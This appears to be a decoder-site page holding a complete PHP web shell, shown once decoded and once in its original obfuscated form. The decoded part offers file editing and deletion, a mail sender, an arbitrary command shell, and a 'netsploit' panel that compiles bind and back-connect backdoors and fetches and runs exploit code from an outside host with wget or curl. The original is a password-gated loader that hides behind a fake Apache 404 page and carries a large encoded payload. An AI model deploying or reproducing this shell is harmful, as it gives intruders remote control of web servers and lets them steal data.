<input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to MySQL</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">FBI!</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="Hello~" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","
"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2"></th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2"></th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://blackbap.org/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th></th><th></th><th>Load & Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="blackbap.org/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </

Did this file decode correctly?

Original Code

<?php
@session_start();
@set_time_limit(0); 
@error_reporting(0);
$salt = "silic1234";
$psw = trim($_POST['pass']);
$pass = $salt.$psw;
$pass = md5(md5(md5($pass)));
$chk_login = 1;
$password = "8f841a9b44b0167db6056389e0106af4";
if($pass == $password)
{
$_SESSION['ses'] = "$pass";
}
if($chk_login)
{
if(!isset($_SESSION['ses']) or $_SESSION['ses'] != $password)
{
die("
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80 </address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
");
}
}
$code = "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